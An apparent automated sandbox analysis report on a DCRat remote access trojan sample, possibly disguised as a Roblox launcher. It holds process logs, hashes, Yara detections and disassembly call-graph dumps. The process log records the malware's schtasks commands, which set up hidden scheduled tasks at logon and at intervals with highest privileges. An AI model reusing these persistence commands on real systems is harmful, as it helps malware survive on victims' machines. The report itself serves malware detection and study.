            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:34
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:35
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:36
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:37
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:38
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            Imagebase:0x4b0000
            File size:847'360 bytes
            MD5 hash:EF0F547DFEF34380202700FDEDDC1CC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2048959997.0000000002721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 88%, ReversingLabs
            Has exited:true

            Target ID:39
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:40
            Start time:20:57:22
            Start date:30/05/2024
            Path:C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            Imagebase:0xa10000
            File size:847'360 bytes
            MD5 hash:EF0F547DFEF34380202700FDEDDC1CC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:false

            Target ID:41
            Start time:20:57:22
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true


              Execution Graph

              Execution Coverage:84.6%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:40%
              Total number of Nodes:5
              Total number of Limit Nodes:1

              Callgraph

              • Executed
              • Not Executed
              • Opacity -> Relevance
              • Disassembly available
              callgraph 0 Function_00401000 1 Function_00401AD8 1->0

              Control-flow Graph

              APIs
              • GetCommandLineA.KERNEL32 ref: 00401AD8
              • GetModuleHandleA.KERNEL32(00000000), ref: 00401AE4
              • GetProcessHeap.KERNEL32(00000000), ref: 00401AEE
                • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
              • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
              Memory Dump Source
              • Source File: 00000000.00000002.1750986638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1750920175.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751045953.0000000000402000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751095239.0000000000403000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751095239.0000000000408000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751095239.0000000000410000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751408463.0000000000411000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751408463.0000000000E11000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1755166666.000000000112C000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_RFAwChXSve.jbxd
              Similarity
              • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
              • String ID:
              • API String ID: 673778540-0
              • Opcode ID: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
              • Instruction ID: 8dce49216dd7d9d4199a49ca56cfbc69a4ccef7545e9a5bd4d655d6bb2b69eda
              • Opcode Fuzzy Hash: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
              • Instruction Fuzzy Hash: 50E06774A45300AAE7217F71AE02B193E75A74174AF00007BB601791F6EBB86A109B5D

              Control-flow Graph

              APIs
              • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
              • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
              • RegisterClassExA.USER32(00000030), ref: 0040106E
              • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
              • ShowWindow.USER32(00000001,?), ref: 004010BC
              • UpdateWindow.USER32(00000001), ref: 004010C7
              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
              • TranslateMessage.USER32(?), ref: 004010E4
              • DispatchMessageA.USER32(?), ref: 004010ED
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1750986638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1750920175.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751045953.0000000000402000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751095239.0000000000403000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751095239.0000000000408000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751095239.0000000000410000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751408463.0000000000411000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1751408463.0000000000E11000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1755166666.000000000112C000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_RFAwChXSve.jbxd
              Similarity
              • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
              • String ID: 0$WinClass32
              • API String ID: 282685165-2329282442
              • Opcode ID: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
              • Instruction ID: 47d6b7d35728adeecb0fde599aadb8774aba34f0bad3284053c57367e6fa7a97
              • Opcode Fuzzy Hash: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
              • Instruction Fuzzy Hash: 7D210C70D41249AAEF10EFD0CC46BDDBFB8AB04708F20802AF200BA1E5D7B96655DB5C

              Execution Graph

              Execution Coverage:8.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:4.2%
              Total number of Nodes:502
              Total number of Limit Nodes:9
2560->2561 2562 a21502 2561->2562 2563 a211dc ___free_lconv_mon 14 API calls 2562->2563 2564 a21513 2563->2564 2565 a211dc ___free_lconv_mon 14 API calls 2564->2565 2566 a21521 2565->2566 2567 a211dc ___free_lconv_mon 14 API calls 2566->2567 2568 a2152f 2567->2568 2569 a199dc ___free_lconv_mon 14 API calls 2568->2569 2570 a2153a 2569->2570 2571 a199dc ___free_lconv_mon 14 API calls 2570->2571 2572 a21545 2571->2572 2573 a199dc ___free_lconv_mon 14 API calls 2572->2573 2574 a21550 2573->2574 2575 a199dc ___free_lconv_mon 14 API calls 2574->2575 2575->2576 2576->2540 2578 a211ee 2577->2578 2579 a211fd 2578->2579 2580 a199dc ___free_lconv_mon 14 API calls 2578->2580 2579->2545 2580->2578 2581->2466 2650 a13368 2582->2650 2585 a13575 2586 a13581 ___free_lconv_mon 2585->2586 2587 a19ea5 ___free_lconv_mon 14 API calls 2586->2587 2590 a135ae 2586->2590 2593 a135a8 2586->2593 2587->2593 2588 a135f5 2589 a0424a ___free_lconv_mon 14 API calls 2588->2589 2591 a135fa 2589->2591 2592 a13621 2590->2592 2661 a1738d EnterCriticalSection 2590->2661 2594 9fb78f 43 API calls 2591->2594 2597 a13663 2592->2597 2598 a13754 2592->2598 2607 a13692 2592->2607 2593->2588 2593->2590 2615 a135df 2593->2615 2594->2615 2603 a19d54 43 API calls 2597->2603 2597->2607 2600 a1375f 2598->2600 2666 a173d5 LeaveCriticalSection 2598->2666 2602 a141bd 23 API calls 2600->2602 2612 a13767 ___free_lconv_mon 2602->2612 2605 a13687 2603->2605 2604 a19d54 43 API calls 2608 a136e7 2604->2608 2606 a19d54 43 API calls 2605->2606 2606->2607 2662 a13701 2607->2662 2614 a19d54 43 API calls 2608->2614 2608->2615 2609 a1384e 2674 a1738d EnterCriticalSection 2609->2674 2612->2609 2617 a137b9 2612->2617 2624 a137c8 2612->2624 2613 a13862 2616 a13879 SetConsoleCtrlHandler 2613->2616 2621 a1388a ___free_lconv_mon 2613->2621 2614->2615 2615->2370 2618 a13893 GetLastError 2616->2618 2616->2621 2619 a19ea5 ___free_lconv_mon 14 API calls 2617->2619 2617->2624 2675 a04237 2618->2675 2622 a137d3 2619->2622 2678 a13905 
2621->2678 2622->2624 2667 a1a2f8 2622->2667 2626 a13819 2624->2626 2681 a134ff 2624->2681 2626->2370 2628 9fb5af 2627->2628 2629 9fb5db IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 2628->2629 2630 9fb6ac 2629->2630 2687 9e15fd 2630->2687 2632 9fb6ca 2632->2373 2695 a14024 2633->2695 2772 9fb6db 2636->2772 2640 a1520b 2639->2640 2642 a15232 2640->2642 2835 a1562b 2640->2835 2643 a15275 2642->2643 2644 a15250 2642->2644 2847 a15921 2643->2847 2839 a15950 2644->2839 2647 a15270 2648 9e15fd _ValidateLocalCookies 5 API calls 2647->2648 2649 a15299 2648->2649 2649->2383 2651 a13374 ___free_lconv_mon 2650->2651 2656 a1738d EnterCriticalSection 2651->2656 2653 a13382 2657 a133c0 2653->2657 2656->2653 2660 a173d5 LeaveCriticalSection 2657->2660 2659 a053cb 2659->2370 2659->2585 2660->2659 2661->2592 2663 a13707 2662->2663 2664 a136d8 2662->2664 2685 a173d5 LeaveCriticalSection 2663->2685 2664->2604 2664->2608 2664->2615 2666->2600 2668 a1a336 2667->2668 2672 a1a306 ___free_lconv_mon 2667->2672 2670 a0424a ___free_lconv_mon 14 API calls 2668->2670 2669 a1a321 RtlAllocateHeap 2671 a1a334 2669->2671 2669->2672 2670->2671 2671->2624 2672->2668 2672->2669 2673 a20a25 ___free_lconv_mon 2 API calls 2672->2673 2673->2672 2674->2613 2676 a19ea5 ___free_lconv_mon 14 API calls 2675->2676 2677 a0423c 2676->2677 2677->2621 2686 a173d5 LeaveCriticalSection 2678->2686 2680 a1390c 2680->2624 2682 a13525 2681->2682 2683 a1350c 2681->2683 2682->2626 2683->2682 2684 a0424a ___free_lconv_mon 14 API calls 2683->2684 2684->2682 2685->2664 2686->2680 2688 9e1606 IsProcessorFeaturePresent 2687->2688 2689 9e1605 2687->2689 2691 9e1648 2688->2691 2689->2632 2694 9e160b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2691->2694 2693 9e172b 2693->2632 2694->2693 2696 a14051 2695->2696 2697 a14063 2695->2697 2722 9e1b8b GetModuleHandleW 2696->2722 2707 a13eec 2697->2707 2702 a05409 2702->2378 2702->2382 2705 a140b5 2708 a13ef8 
___free_lconv_mon 2707->2708 2730 a1738d EnterCriticalSection 2708->2730 2710 a13f02 2731 a13f39 2710->2731 2712 a13f0f 2735 a13f2d 2712->2735 2715 a140bb 2760 a140ec 2715->2760 2718 a140d9 2720 a1410e 3 API calls 2718->2720 2719 a140c9 GetCurrentProcess TerminateProcess 2719->2718 2721 a140e1 ExitProcess 2720->2721 2723 9e1b97 2722->2723 2723->2697 2724 a1410e GetModuleHandleExW 2723->2724 2725 a1414d GetProcAddress 2724->2725 2726 a1416e 2724->2726 2725->2726 2729 a14161 2725->2729 2727 a14174 FreeLibrary 2726->2727 2728 a14062 2726->2728 2727->2728 2728->2697 2729->2726 2730->2710 2732 a13f45 ___free_lconv_mon 2731->2732 2734 a13fac 2732->2734 2738 a14fc7 2732->2738 2734->2712 2759 a173d5 LeaveCriticalSection 2735->2759 2737 a13f1b 2737->2702 2737->2715 2739 a14fd3 __EH_prolog3 2738->2739 2742 a14d1f 2739->2742 2741 a14ffa 2741->2734 2743 a14d2b ___free_lconv_mon 2742->2743 2750 a1738d EnterCriticalSection 2743->2750 2745 a14d39 2751 a14ed7 2745->2751 2750->2745 2752 a14ef6 2751->2752 2753 a14d46 2751->2753 2752->2753 2754 a199dc ___free_lconv_mon 14 API calls 2752->2754 2755 a14d6e 2753->2755 2754->2753 2758 a173d5 LeaveCriticalSection 2755->2758 2757 a14d57 2757->2741 2758->2757 2759->2737 2765 a1ccf5 GetPEB 2760->2765 2763 a140f6 GetPEB 2764 a140c5 2763->2764 2764->2718 2764->2719 2766 a1cd0f 2765->2766 2767 a140f1 2765->2767 2769 a1a6d3 2766->2769 2767->2763 2767->2764 2770 a1a650 ___free_lconv_mon 5 API calls 2769->2770 2771 a1a6ef 2770->2771 2771->2767 2773 9fb6ed 2772->2773 2778 9fb712 2773->2778 2775 9fb705 2789 9fb4cb 2775->2789 2779 9fb729 2778->2779 2780 9fb722 2778->2780 2785 9fb737 2779->2785 2799 9fb507 2779->2799 2795 9fb530 GetLastError 2780->2795 2783 9fb75e 2783->2785 2802 9fb7bc IsProcessorFeaturePresent 2783->2802 2785->2775 2786 9fb78e 2787 9fb6db 45 API calls 2786->2787 2788 9fb79b 2787->2788 2788->2775 2790 9fb4d7 2789->2790 2792 9fb4ee 2790->2792 2828 9fb576 2790->2828 2793 9fb576 45 API calls 2792->2793 2794 9fb501 2792->2794 2793->2794 
2794->2383 2796 9fb549 2795->2796 2806 a19f56 2796->2806 2800 9fb52b 2799->2800 2801 9fb512 GetLastError SetLastError 2799->2801 2800->2783 2801->2783 2803 9fb7c8 2802->2803 2804 9fb593 8 API calls 2803->2804 2805 9fb7dd GetCurrentProcess TerminateProcess 2804->2805 2805->2786 2807 a19f69 2806->2807 2810 a19f6f 2806->2810 2808 a1a8a1 ___free_lconv_mon 6 API calls 2807->2808 2808->2810 2809 a1a8e0 ___free_lconv_mon 6 API calls 2812 a19f89 2809->2812 2810->2809 2811 9fb561 SetLastError 2810->2811 2811->2779 2812->2811 2813 a1a29b ___free_lconv_mon 14 API calls 2812->2813 2814 a19f99 2813->2814 2815 a19fa1 2814->2815 2816 a19fb6 2814->2816 2818 a1a8e0 ___free_lconv_mon 6 API calls 2815->2818 2817 a1a8e0 ___free_lconv_mon 6 API calls 2816->2817 2819 a19fc2 2817->2819 2820 a19fad 2818->2820 2821 a19fd5 2819->2821 2822 a19fc6 2819->2822 2823 a199dc ___free_lconv_mon 14 API calls 2820->2823 2825 a19b82 ___free_lconv_mon 14 API calls 2821->2825 2824 a1a8e0 ___free_lconv_mon 6 API calls 2822->2824 2823->2811 2824->2820 2826 a19fe0 2825->2826 2827 a199dc ___free_lconv_mon 14 API calls 2826->2827 2827->2811 2829 9fb589 2828->2829 2830 9fb580 2828->2830 2829->2792 2831 9fb530 16 API calls 2830->2831 2832 9fb585 2831->2832 2832->2829 2833 a053c6 45 API calls 2832->2833 2834 9fb592 2833->2834 2836 a15656 2835->2836 2837 a1584f RaiseException 2836->2837 2838 a15868 2837->2838 2838->2642 2840 a1595d 2839->2840 2841 a1596c 2840->2841 2843 a1599b 2840->2843 2842 a15921 14 API calls 2841->2842 2844 a15985 2842->2844 2845 a159e9 2843->2845 2846 a15921 14 API calls 2843->2846 2844->2647 2845->2647 2846->2845 2848 a15943 2847->2848 2850 a1592e 2847->2850 2849 a0424a ___free_lconv_mon 14 API calls 2848->2849 2851 a15948 2849->2851 2850->2851 2852 a0424a ___free_lconv_mon 14 API calls 2850->2852 2851->2647 2853 a1593b 2852->2853 2853->2647 2855 a1a650 ___free_lconv_mon 5 API calls 2854->2855 2856 a1a72f 2855->2856 2856->2326 2858 a19ea5 ___free_lconv_mon 14 API calls 2857->2858 2860 
a055c4 2858->2860 2859 a05606 ExitThread 2860->2859 2861 a055dd 2860->2861 2866 a1abc4 2860->2866 2863 a055f0 2861->2863 2864 a055e9 CloseHandle 2861->2864 2863->2859 2865 a055fc FreeLibraryAndExitThread 2863->2865 2864->2863 2865->2859 2867 a1a650 ___free_lconv_mon 5 API calls 2866->2867 2868 a1abdd 2867->2868 2868->2861 2869 9e5039 2870 9e5043 2869->2870 2872 9e5054 2869->2872 2870->2872 2873 9fb468 2870->2873 2874 a199dc ___free_lconv_mon 14 API calls 2873->2874 2875 9fb480 2874->2875 2875->2872 2876 a1a2f8 2877 a1a336 2876->2877 2881 a1a306 ___free_lconv_mon 2876->2881 2879 a0424a ___free_lconv_mon 14 API calls 2877->2879 2878 a1a321 RtlAllocateHeap 2880 a1a334 2878->2880 2878->2881 2879->2880 2881->2877 2881->2878 2882 a20a25 ___free_lconv_mon 2 API calls 2881->2882 2882->2881 2894 a133eb 2895 a133f7 ___free_lconv_mon 2894->2895 2900 a1738d EnterCriticalSection 2895->2900 2897 a13406 2901 a13466 2897->2901 2900->2897 2904 a173d5 LeaveCriticalSection 2901->2904 2903 a13458 2904->2903 2905 a3d7c8 2906 9e15fd _ValidateLocalCookies 5 API calls 2905->2906 2907 a3d7db 2906->2907 2883 a141bd 2884 a14024 23 API calls 2883->2884 2885 a141ce 2884->2885 2908 9e0ed2 2911 9e1cd2 2908->2911 2910 9e0ed7 2910->2910 2912 9e1ce8 2911->2912 2913 9e1cf1 2912->2913 2915 9e1c85 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2912->2915 2913->2910 2915->2913 2916 9f8b30 2917 9f8b4e 2916->2917 2930 9f8af0 2917->2930 2931 9f8b0f 2930->2931 2932 9f8b02 2930->2932 2933 9e15fd _ValidateLocalCookies 5 API calls 2932->2933 2933->2931 2934 9fb140 2935 9fb152 2934->2935 2937 9fb160 2934->2937 2936 9e15fd _ValidateLocalCookies 5 API calls 2935->2936 2936->2937

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 165 a1ccb1-a1ccc1 166 a1ccf0-a1ccf4 165->166 167 a1ccc3-a1ccd4 GetPEB 165->167 168 a1cce7-a1ccee 167->168 169 a1ccd6-a1ccda call a1a713 167->169 168->166 171 a1ccdf-a1cce2 169->171 171->168 172 a1cce4-a1cce6 171->172 172->168
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10da144da914dd2faf3d421d28ef601c0b9e7735ef28dcfe1e59c1eefae066f2
              • Instruction ID: d809036d1e58cc50aa8b382f9fa9d4f6df48fdc21bcbd55c9ce59e807c5a5e3d
              • Opcode Fuzzy Hash: 10da144da914dd2faf3d421d28ef601c0b9e7735ef28dcfe1e59c1eefae066f2
              • Instruction Fuzzy Hash: 38F06D32A61224EBCB26DB4CC505A9973BCEB45B65F110096F505EB241C2B0DE80C7D0

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 a1a585-a1a591 1 a1a623-a1a626 0->1 2 a1a596-a1a5a7 1->2 3 a1a62c 1->3 5 a1a5b4-a1a5cd LoadLibraryExW 2->5 6 a1a5a9-a1a5ac 2->6 4 a1a62e-a1a632 3->4 9 a1a633-a1a643 5->9 10 a1a5cf-a1a5d8 GetLastError 5->10 7 a1a5b2 6->7 8 a1a64c-a1a64e 6->8 12 a1a620 7->12 8->4 9->8 11 a1a645-a1a646 FreeLibrary 9->11 13 a1a611-a1a61e 10->13 14 a1a5da-a1a5ec call a05ef7 10->14 11->8 12->1 13->12 14->13 17 a1a5ee-a1a600 call a05ef7 14->17 17->13 20 a1a602-a1a60f LoadLibraryExW 17->20 20->9 20->13
              APIs
              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,6AE65F7C,?,00A1A692,?,?,?,00000000), ref: 00A1A646
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: 208f71ed4d0b719709d8750d150f0a2e3b3a7144b6241ba701a35d32833fa035
              • Instruction ID: ef4435954a3024d8cb022ce834c76369283fce7908d7cdc0cd6769256ebdd45a
              • Opcode Fuzzy Hash: 208f71ed4d0b719709d8750d150f0a2e3b3a7144b6241ba701a35d32833fa035
              • Instruction Fuzzy Hash: 0E213D76E06210ABCB329B64EC40ADB7BADDF51370F180120F815A72D1DB30ED41C6D1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 21 a055b9-a055c6 call a19ea5 24 a05606-a05609 ExitThread 21->24 25 a055c8-a055d0 21->25 25->24 26 a055d2-a055d6 25->26 27 a055d8 call a1abc4 26->27 28 a055dd-a055e3 26->28 27->28 30 a055f0-a055f6 28->30 31 a055e5-a055e7 28->31 30->24 32 a055f8-a055fa 30->32 31->30 33 a055e9-a055ea CloseHandle 31->33 32->24 34 a055fc-a05600 FreeLibraryAndExitThread 32->34 33->30 34->24
              APIs
                • Part of subcall function 00A19EA5: GetLastError.KERNEL32(00000000,?,00A0424F,00A1A2ED,?,?,00A19DA1,00000001,00000364,?,00000006,000000FF,?,00A05529,00B47218,0000000C), ref: 00A19EA9
                • Part of subcall function 00A19EA5: SetLastError.KERNEL32(00000000), ref: 00A19F4B
              • CloseHandle.KERNEL32(?,?,?,00A056F0,?,?,00A05562,00000000), ref: 00A055EA
              • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,00A056F0,?,?,00A05562,00000000), ref: 00A05600
              • ExitThread.KERNEL32 ref: 00A05609
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
              • String ID:
              • API String ID: 1991824761-0
              • Opcode ID: 40586de7f601c6746e19bf40a34f0e4dfae9b5a182251cbe3caa1a9dd75485d5
              • Instruction ID: 5409e56de043acacab75a453b86ffadee238170dee6c38dd643b79a99aaccb91
              • Opcode Fuzzy Hash: 40586de7f601c6746e19bf40a34f0e4dfae9b5a182251cbe3caa1a9dd75485d5
              • Instruction Fuzzy Hash: FEF08274804A496BDB319BB9DD0CA5B3B9A6F01360F5C4A10F829C60F1EB32ED52CF90

              Control-flow Graph

              APIs
              • GetCurrentProcess.KERNEL32(00000002,?,00A140B5,00A05409,00A05409,?,00000002,6AE65F7C,00A05409,00000002), ref: 00A140CC
              • TerminateProcess.KERNEL32(00000000,?,00A140B5,00A05409,00A05409,?,00000002,6AE65F7C,00A05409,00000002), ref: 00A140D3
              • ExitProcess.KERNEL32 ref: 00A140E5
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 759ee7fabe2af72b44d82f586e88cc17b1f3853521c7aad4393c23a74f47673d
              • Instruction ID: 3a98890832b10b93a759d7b33ccc4f7f60f1ae0e39bd3c1366169b26979eba62
              • Opcode Fuzzy Hash: 759ee7fabe2af72b44d82f586e88cc17b1f3853521c7aad4393c23a74f47673d
              • Instruction Fuzzy Hash: 3DD05E3D004144BBCF11AFA5DD0D8DC3F2AEF893517104010F90546032CB7688D28A80

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 42 a1a650-a1a678 43 a1a67a-a1a67c 42->43 44 a1a67e-a1a680 42->44 47 a1a6cf-a1a6d2 43->47 45 a1a682-a1a684 44->45 46 a1a686-a1a68d call a1a585 44->46 45->47 49 a1a692-a1a696 46->49 50 a1a6b5-a1a6cc 49->50 51 a1a698-a1a6a6 GetProcAddress 49->51 53 a1a6ce 50->53 51->50 52 a1a6a8-a1a6b3 call a133cc 51->52 52->53 53->47
              Strings
              Memory Dump Source
